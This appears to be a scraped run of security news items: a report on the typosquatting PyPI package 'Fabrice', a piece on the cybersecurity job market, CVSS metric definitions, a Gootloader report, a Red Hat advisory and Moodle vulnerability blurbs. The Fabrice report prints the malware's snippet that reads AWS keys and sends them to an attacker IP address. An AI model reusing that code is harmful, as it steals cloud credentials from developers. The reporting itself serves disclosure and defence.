The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years

While training and credentialing organizations continue to talk about a "gap" in skilled cybersecurity workers, demand — especially for entry-level workers — has plateaued, spurring criticism of the latest rosy stats that seem to support a hot market for qualified cyber pros.

Source: Gorodenkoff via Shutterstock

When training and credential provider ISC2s released its latest workforce analysis recently, the report's continued focus on a gap between the number of "needed" cybersecurity professionals and the estimate of the current workforce touched off a backlash.

Following discussions with dozens of unemployed cybersecurity professionals, field CISO Ira Winkler of CYE Security wrote an open letter to ISC2, criticizing ISC2's continued focus on the gap as a measure of true demand. Ben Rothke, a senior information security manager at Experian, also took issue with the data, as well as the marketing that fuels get-rich-in-cybersecurity training programs.

Rather than a healthy market for cybersecurity labor, workforce estimates have plateaued — both in North America and worldwide — suppressed by a lack of budget to pay for cybersecurity hires. It's something even the ISC2 even flagged in its report. Essentially, no matter how much businesses may want to hire additional cybersecurity professionals — and 59% of professionals surveyed by ISC2 claim to need skilled workers — budgets are tight and being spent elsewhere, resulting in stagnating demand for cybersecurity workers.

It's high time to sit down prospective cybersecurity professionals for a real-world talk, Winkler says.

"My gut reaction was, hey, whatever the number of openings is, that should not be \[ISC2's\] concern — they should be worried about the members who are long-term unemployed, of which there are many," he says. "Many of these people are really frustrated hearing that there's all these openings, and they can't get one."

For years now, reports from a number of organizations estimating the cybersecurity workforce size (and its potential size) have focused on the "cybersecurity workforce gap" between the number of workers that security managers claim they need and the estimate of actual workers they have in place. The perceived gap has attracted potential students to train — or increasingly, retrain — for a job in cybersecurity. In late October, when the ISC2 released its aforementioned "2024 Cybersecurity Workforce Study" report, the organization estimated the gap had grown 4% to 543,000 for cybersecurity workers needed in North America, while its estimate of the existing workforce shrank by 2.7% to 1.45 million.

Overall, the cybersecurity jobs market continues to struggle with factors including overestimates of demand, a lack of well defined career paths, and subpar training, industry watchers say.

**Skills Gaps & Job Postings**

The ISC2's survey of more than 15,8000 practitioners and decision-makers is a good-faith attempt at determining how much cybersecurity expertise is needed by businesses worldwide. But even with the majority of those surveyed claiming a need to hire more help, when paired with other data — such as job openings and government data — the ISC2 noted that "the cybersecurity workforce growth is slowing" worldwide, essentially plateauing with a 0.1% growth rate.

Still, using the same data, the shortfall in cybersecurity workers is estimated to be 4.8 million globally.

"For clarity, that doesn't mean there is 4.8 million jobs out there," acknowledges Jon France, CISO for ISC2. "It means the profession — by asking nearly 16,000 people and using secondary data sources — reckons that to become secure as we need to be, 4.8 million people need to come into the market."

The cybersecurity workforce peaked in North America in 2023 and has plateaued globally, while the overall "needed" workforce continues to grow globally. Source: Author, using data from ISC2's Cybersecurity Workforce Studies 2021-2024

Cyberseek — a collaboration between certificate group CompTIA, workforce analysis firm Lightcast, and the US National Institute of Standards and Technology (NIST) — estimates that there are 457,000 cybersecurity-related job openings in the United States and a total workforce of 1.25 million, according to its website. The analysis counts any worker with significant cybersecurity responsibilities as related to cybersecurity, and it focuses on counting actual job postings with an emphasis on deduplicating, says Will Markow, formerly with Lightcast but now senior vice president of Workforce Solutions for Cyberwarrior, a training and consulting services firm.

"That's gives us a view into how many jobs there actually are, not how many jobs companies would like there to be," he says. "You can think of the estimates as two ends of the spectrum: They both still show a gap, but the data from Cyberseek is going to show a smaller gap, because it's looking at how many jobs are companies actively recruiting for and trying to fill, as opposed to how many in an ideal world security leaders would be hiring for if they had as much budget as they could possibly want."

**"Ghost Jobs" & Reverse Pyramids**

Jobseekers are likely also running afoul of the trend in ghost-job posting. Nearly half of hiring managers have admitted to keeping job postings open, even when they are not looking to fill a specific position. That's being used as a way to keep employees motivated, give the impression the company is growing, or to placate overworked employees, according to a survey conducted by Clarify Capital.

These ghost jobs are a significant problem for cybersecurity job seekers in particular, with one resume site estimating that 46% of listings for a cybersecurity analyst in the United Kingdom were positions that would never be filled--compared with about a third for all roles.

Budgets are getting tighter as well, with nearly half of security teams (49%) facing cutbacks in the past year, up from 48% in 2023, according to ISC2. Cutbacks include hiring freezes experienced by 38% of companies, budget cuts faced by 37% of teams, freezes on promotions (32%), and layoffs (25%).

Those economic pressures are another reason that purported jobs are not materializing, says Jon Brandt, director of professional practices and innovation at ISACA, an information-technology certification organization.

"People can respond to any survey and say, hey, we have a need for 20 more people," he says. "But at the end of the day, unless an organization is taking active steps to hire, then that's not a data point we should be looking at right now."

For entry-level workers without significant experience, the picture is especially grim. Cyberseek's career pathway data shows that demand for workers resembles a reverse pyramid. Entry-level jobs are more rare, with about 20,000 jobs available, while there are 34,000 midlevel positions and 73,000 advanced positions.

Entry-level cybersecurity professionals are not in high demand because most security positions require and automation and AI is exacerbating the issues, says Experian's Rothke.

"To a degree, entry-level security is a misnomer," he says. "Security roles really aren't entry level to begin with, because hiring managers want you to have this technical level of IT. So spend a few years to get work experience, and then you're going to get into security."

Job seekers with significant technical experience are still in demand, while those fresh out of a degree program are finding the job search more difficult.

**False Hopes & Expectations: "It's Criminal"**

While there remains a lot of potential in the industry for technical people, especially as the profession expands in the future, job seekers are not currently being well served, cybersecurity recruiter Jeff Combs said recently during a streamed discussion with ISACA's Brandt.

"I think one of the disservices that is being done to many people who are entering the field," Combs said, "is the promise of this new exciting field where, if you finish your degree or you go through this bootcamp or you get this specific certification, you're guaranteed an entry point into a $100,000 per year career path. Honestly, I think it is criminal."

In the end, between economic pressures on security budgets, a pipeline that does not adequately account for training, and training that struggles to provide the right mix of skills, the workforce trials of cybersecurity professionals will likely continue, says Cyberwarrior's Markow.

"I like to think of it right now as a tale of two job markets, because on the one hand, you do see strong evidence of a gap overall within cyber, but there are two different camps of workers who have very different job-hunting experiences," he says.

He adds: "Many companies are still asking for heightened experience requirements, heightened degree requirements, and heightened certification requirements that effectively constrain the talent pipeline into cyber security, and that means that we actually see very different dynamics across different corners of the workforce."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Has the Cybersecurity Workforce Peaked?

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-3m9x-2qfj-xvq4: PHPExcel XXE Vulnerability

It's unclear what the threat actors have against this particular breed of cat, but it's taking down the kitty's enthusiasts with SEO-poisoned links and malware payloads.

Source: Juniors Bildarchiv GmbH via Alamy Stock Photo

New research is showing that criminal cyber actors are seemingly targeting Australians who have a penchant for Bengal cats, a breed of hybrid feline created from crossing of an Asian leopard with domestic breeds.

Armed with Gootloader, a popular malware strain often used as an infostealer or as a malware dropped prior to ransomware attacks, Sophos found that the threat actors are targeting users who search "Are Bengal cats legal in Australia?" and other similar questions.

The researchers found, in one example, that one website returned the following after this kind of search query: a search engine optimization (SEO)-poisoned forum containing hyperlinked texts leading the user to download a .zip file if clicked on. SEO poisoning is what the Gootloader gang is particularly known for, duping victims into clicking on malicious links disguised as legitimate resources.

And this is just the first stage of the malware's payload. 

Following a download, the user is redirected to a different website containing a large JavaScript file. This leads to multiple processes being run on the user's device, allowing threat actors to pass commands and establish persistence to deploy Gootkit — the second stage of the payload— and the malware then acts as a precursor to other tools, such as ransomware or Cobalt Strike.

The detection of the Gootloader variant used in the attacks led to a threat-hunting campaign by Sophos X-Ops MDR, with its researchers reporting that they've "seen continued growth in this approach to initial compromise, with several massive campaigns using this technique over the past year."

And while there are protection blocks that users can implement to detect for this kind of malware, it's best that they adhere to best practices and be wary of suspicious links or sources that may seem questionable. 

**About the Author**

Gootloader Cyberattackers Target Bengal-Cat Aficionados in Oz

Red Hat Security Advisory 2024-8690-03 - Red Hat OpenShift Container Platform release 4.13.53 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8690.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.53 packages and  security update  
Advisory ID:        RHSA-2024:8690-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8690  
Issue date:         2024-11-07  
Revision:           03  
CVE Names:          CVE-2024-9341  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.53 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.53. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:8688

Security Fix(es):

* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)  
* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in  
containers/common Go Library (CVE-2024-9341)  
* Podman: Buildah: CRI-O: symlink traversal vulnerability in the  
containers/storage library can cause Denial of Service (DoS)  
(CVE-2024-9676)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2024-9341

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://bugzilla.redhat.com/show_bug.cgi?id=2315691  
https://bugzilla.redhat.com/show_bug.cgi?id=2317458  
https://bugzilla.redhat.com/show_bug.cgi?id=2317467

Red Hat Security Advisory 2024-8690-03

To address a cache poisoning risk in Moodle, additional validation for local storage was required.

GHSA-2r9m-wg35-rfvc: Moodle vulnerable to cache poisoning via injection into storage

A flaw was found in pdfTeX. Insufficient sanitizing in the TeX notation filter resulted in an arbitrary file read risk on sites where pdfTeX is available, such as those with TeX Live installed.

GHSA-vjmm-r9gg-425m: Moodle has arbitrary file read risk through pdfTeX

A flaw was found in Moodle. Additional restrictions are required to avoid a remote code execution risk in calculated question types. Note: This requires the capability to add/update questions.

GHSA-v6f4-v8h8-3c87: Moodle Remote Code Execution vulnerability

A flaw was found in Feedback. Bulk messaging in the activity's non-respondents report did not verify message recipients belonging to the set of users returned by the report.

GHSA-p9cx-f595-h79h: Moodle's IDOR in Feedback non-respondents report allows messaging arbitrary site users

The bulk message sending feature in Moodle's Feedback module's non-respondents report had an incorrect CSRF token check, leading to a CSRF vulnerability.

Tag

#web